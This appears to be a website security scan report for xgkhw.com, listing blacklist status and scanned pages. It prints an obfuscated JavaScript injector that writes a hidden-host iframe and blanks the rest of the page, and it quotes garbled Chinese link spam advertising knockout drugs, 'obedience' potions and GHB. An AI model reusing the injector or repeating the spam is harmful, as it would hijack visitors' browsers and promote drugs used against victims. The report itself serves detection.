Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xgkhw.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.xgkhw.com/ | 200 OK Content-Length: 14816 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: facuxtz.xgkhw.com ...[2327 bytes skipped]... ime">2014-04-16</div> <div class="comment list7"> <img s10</a> <a class="nextPage" href="/2.html">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://facuxtz.xgkhw.com/">»è˯ҩ¶àÉÙÇ®</a></li><li><a href="http://factvvy.xgkhw.com/">ºù«µºÄÄÀïÂòÃÔÒ©</a></li><li><a href="http://factbau.xgkhw.com/">ͳ·¬ÃÔÒ©</a></li><li><a href="http://factvaa.xgkhw.com/">ÁÙÏÄÄÄÀïÂòÃÔÒ©</a></li><li><a href="http://facbxzy.xgkhw.com/">ÏãÑÌÐÍÃÔÇéÏãË®</a></li><li><a href="http://facuyth.xgkhw.com/">ÃÔ»èÏãÔõô¹ºÂò</a></li><li>< ...[1989 bytes skipped]... | ||
http://www.xgkhw.com/js.js | 200 OK Content-Length: 928 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="23'+'80" src="ht'+'tp://'+'ww'+'w.c'+'ls'+'k8.c'+'om/"></iframe></center>';
eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');"); try{ setInterval(function(){ try{ document.getElementById("div"+"All").style.display="no"+"ne"; }catch(e){} for(var i=0;i<document.body.children.length;i++){ try{ var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){ document.body.children[i].style.display="non"+"e"; } }catch(e){} } },100); }catch(e){} Antivirus reports:
| ||
http://www.xgkhw.com/tj.js | 200 OK Content-Length: 132 Content-Type: application/x-javascript | clean |
http://www.xgkhw.com/2.html | 200 OK Content-Length: 14702 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: facxubx.xgkhw.com ...[2295 bytes skipped]... <div class="content_time">2014-04-19</div> <div class="comment list48848"> tPage" href="/3.html">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://facxubx.xgkhw.com/">¶Ä²©Ò©Ë®µ½ÄÄÀïÂò</a></li><li><a href="http://facttat.xgkhw.com/">¹þ¶û±õÃÔÒ©</a></li><li><a href="http://facqzyu.xgkhw.com/">ÅçÎíº£ÀÖÉñÄÄÀï³öÊÛ</a></li><li><a href="http://facthv.xgkhw.com/">ÄÄÀïÓÐÂé×íÒ©Âò</a></li><li><a href="http://facxxxy.xgkhw.com/">ÏãÑÌÃÔ»ÃÒ©¼Û¸ñ</a></li><li><a href="http://faczbuv.xgkhw.com/">ÌìË®ÃÔÒ©ÄÄÀïÂò</a></li><li&g ...[2009 bytes skipped]... | ||
http://www.xgkhw.com/1.html | 200 OK Content-Length: 14746 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: facaqx.xgkhw.com ...[2268 bytes skipped]... _title">¿ñº®ÃÎ</div> <div class="content_time">2014-04-19</div> <div class="comment list89481"> ÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://facaqx.xgkhw.com/">ÅçÎíÃÔÔÎÒ©</a></li><li><a href="http://factuaa.xgkhw.com/">ŽÔõôÂòÃÔÒ©</a></li><li><a href="http://facyhqt.xgkhw.com/">ÄÄÓгöÊÛÅļçÃÔ»èÒ©</a></li><li><a href="http://factax.xgkhw.com/">Ôõô¹ºÂòÃÔÏã</a></li><li><a href="http://faczbuv.xgkhw.com/">ÌìË®ÃÔÒ©ÄÄÀïÂò</a></li><li><a href="http://facuxhv.xgkhw.com/">ÄÄÀïÓÐÃÔµ¹Ò©Âò</a></li><li>< ...[2032 bytes skipped]... | ||
http://www.xgkhw.com/3.html | 200 OK Content-Length: 14932 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: facuhhq.xgkhw.com ...[2281 bytes skipped]... tle">×£ºê´ï</div> <div class="content_time">2014-04-19</div> <div class="comment list6621"href="/4.html">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://facuhhq.xgkhw.com/">ÃÔÔÎÏãÑ̳öÊÛ</a></li><li><a href="http://facbqzq.xgkhw.com/">ÄÄÀïÓÐÂôÕæµÄÈÃÈËʧȥ֪¾õµÄÒ©</a></li><li><a href="http://faczyzh.xgkhw.com/">ÄÄÀïÂòЧ¹û×îºÃµÄÉ߶¾</a></li><li><a href="http://facyzyz.xgkhw.com/">È¥ÄÄÀïÂò¹Ô¹ÔÌý»°Ë®</a></li><li><a href="http://facyvay.xgkhw.com/">ÅçÎí»èÃÔÒ©ÔõôÂòµ½</a></li><li><a href="http://facubb.xgkhw.com/">ÔõôÂòÌý»°Ò©Ë®</ ...[2016 bytes skipped]... | ||
http://www.xgkhw.com/4.html | 200 OK Content-Length: 14560 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fachahq.xgkhw.com ...[2276 bytes skipped]... t;Û³Ö®»±</div> <div class="content_time">2014-04-19</div> <div class="comment list652009"> l">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://fachahq.xgkhw.com/">ÅçÎí»èÃÔÅç¼Á</a></li><li><a href="http://facxbty.xgkhw.com/">ÄÄÀïÄÜÂòµ½ÃÔ»ÃÒ©Ë®</a></li><li><a href="http://facxhxz.xgkhw.com/">¿Ú·þÅļçÃÔ»ÃÒ©</a></li><li><a href="http://facxuu.xgkhw.com/">ÄÄÀï¿ÉÒÔÂòµ½ÕæµÄÃÔ»ÃÒ©</a></li><li><a href="http://factvy.xgkhw.com/">Âé×íÒ©µ½ÄÄÀïÂò</a></li><li><a href="http://facutuq.xgkhw.com/">ghbË®³öÊÛ</a></li><li ...[2028 bytes skipped]... | ||
http://www.xgkhw.com/5.html | 200 OK Content-Length: 14822 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: facbubt.xgkhw.com ...[2301 bytes skipped]... div class="content_time">2014-04-19</div> <div class="comment list73"> <img src="hnextPage" href="/6.html">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://facbubt.xgkhw.com/">´ßÇéÒ©Ë®Åä·½</a></li><li><a href="http://faczux.xgkhw.com/">¹Ô¹ÔË®ÓÐÓÃÂð</a></li><li><a href="http://facuyaq.xgkhw.com/">ÃÔÔÎÒ©Ë®ÍøÕ¾</a></li><li><a href="http://faczzu.xgkhw.com/">»èÃÔÒ©ÈçºÎ¹ºÂò</a></li><li><a href="http://factyxx.xgkhw.com/">ÈÕ¿¦ÔòÔõôÂòÃÔÒ©</a></li><li><a href="http://facqhuv.xgkhw.com/">¶©¹ºÃÔ»êÏãÄÄÀïÂò</a></li><li>< ...[2006 bytes skipped]... | ||
http://www.xgkhw.com/6.html | 200 OK Content-Length: 14713 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: facuqyx.xgkhw.com ...[2284 bytes skipped]... ="content_title">Ï°ºêÊ¢</div> <div class="content_time">2014-04-19</div> <div class="coe" href="/7.html">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://facuqyx.xgkhw.com/">ÅçÎí¶Ä²©ÏãÑÌ</a></li><li><a href="http://facyqzv.xgkhw.com/">ÄÄÀïÓÐÂôÈÃÈË˵ʵ»°µÄÒ©Ë®</a></li><li><a href="http://facyvxu.xgkhw.com/">È¥ÄÄÂòÅçÎíÃÔ»èÒ©</a></li><li><a href="http://facutqx.xgkhw.com/">ÅçÎíÐͶÄÒ©</a></li><li><a href="http://facxzqq.xgkhw.com/">ÃÔ»êÏã¼Û¸ñ</a></li><li><a href="http://facqztq.xgkhw.com/">º£ÀÖÉñÈçºÎ¹ºÂò</a></li><li& ...[2013 bytes skipped]... | ||
http://www.xgkhw.com/7.html | 200 OK Content-Length: 14907 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fachava.xgkhw.com ...[2302 bytes skipped]... <div class="content_title">ϵÊéÀÙ</div> <div class="content_time">2014-04-19</div> <a class="nextPage" href="/8.html">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://fachava.xgkhw.com/">»èÃÔÅç¼ÁÔõôÂòµ½</a></li><li><a href="http://facuqat.xgkhw.com/">fm2·Û¹ºÂò</a></li><li><a href="http://faczuqq.xgkhw.com/">ÃÔÏãÒ©ÄÄÀï¿ÉÒÔÂòµ½</a></li><li><a href="http://facqvyz.xgkhw.com/">ÄÄÀïÂôÌý»°Ò©</a></li><li><a href="http://facuatb.xgkhw.com/">ÄÄÓÐÌý»°·ÛÂô</a></li><li><a href="http://fachqyt.xgkhw.com/">ÔõôÂòµ½ÏãÑÌÃÔÒ©</a></li><li> ...[1995 bytes skipped]... | ||
http://www.xgkhw.com/8.html | 200 OK Content-Length: 14758 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: facyxtt.xgkhw.com ...[2282 bytes skipped]... ;ÃØÑãɽ</div> <div class="content_time">2014-04-19</div> <div class="comment list88006"> /9.html">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://facyxtt.xgkhw.com/">Åļç»èÃÔÒ©ÄÄÀﹺÂò</a></li><li><a href="http://facthxv.xgkhw.com/">¹ãÖÝÄÄÀïÂòÃÔÒ©</a></li><li><a href="http://facbhhb.xgkhw.com/">ÄÄÀïÓÐÂô´ßÇéÒ©</a></li><li><a href="http://facztvy.xgkhw.com/">¹þ¶û±õÃÔÒ©ÄÄÀïÂò</a></li><li><a href="http://faczvbh.xgkhw.com/">ÃÔÒ©ÄÄÀﹺÂò</a></li><li><a href="http://fachtyq.xgkhw.com/">Ò½ÓÃÒÒÃÑÄÄÓгöÊÛ</a></li>< ...[2022 bytes skipped]... | ||
http://www.xgkhw.com/9.html | 200 OK Content-Length: 14705 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: faczvuz.xgkhw.com ...[2281 bytes skipped]... > <div class="content_time">2014-04-19</div> <div class="comment list445026"> 0.html">ÏÂÒ»Ò³</a> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://faczvuz.xgkhw.com/">ÄÄÀïÂòÃÔÒ©</a></li><li><a href="http://faczhvz.xgkhw.com/">ɱÖíÒ©ÄÄÀïÓÐÂô</a></li><li><a href="http://factbbb.xgkhw.com/">±Ï½ÚÃÔÒ©</a></li><li><a href="http://facbhtu.xgkhw.com/">µ½ÄÄÀïÂò´ßÇéÏãË®</a></li><li><a href="http://fachzzz.xgkhw.com/">¹ºÂòÈýßòÂØƬ</a></li><li><a href="http://facbxqh.xgkhw.com/">ÃÔÇéÏãË®ÔõôÓÃ</a></li><li><a hre ...[2023 bytes skipped]... | ||
http://www.xgkhw.com/10.html | 200 OK Content-Length: 14799 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: facbyxa.xgkhw.com ...[2282 bytes skipped]... le">×£ºÑô</div> <div class="content_time">2014-04-19</div> <div class="comment list42915n class="current">10</span> </div> </div> </div> <div id="footer"> <div class="friendlink"> <ul> <li><a href="http://facbyxa.xgkhw.com/">Å®ÐÔ´ßÇéÒ©ÈçºÎ¹ºÂò</a></li><li><a href="http://fachxbb.xgkhw.com/">¹Ô¹Ô·ÛÔõô¹ºÂò</a></li><li><a href="http://facxqut.xgkhw.com/">ÃԻüÁÔõôÂò</a></li><li><a href="http://fachtzt.xgkhw.com/">ÍâÓÃÒ½ÓÃÒÒÃÑ</a></li><li><a href="http://factbzx.xgkhw.com/">¸Ê×ÎÃÔÒ©</a></li><li><a href="http://fachqyq.xgkhw.com/">ÏãÑÌÃÔÒ©ÔõôÂò</a></li><li><a ...[2015 bytes skipped]... | ||
http://www.xgkhw.com/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xgkhw.com
Result:
GET / HTTP/1.1
Host: xgkhw.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xgkhw.com
Referer: http://www.google.com/search?q=xgkhw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xgkhw.com
Referer: http://www.google.com/search?q=xgkhw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.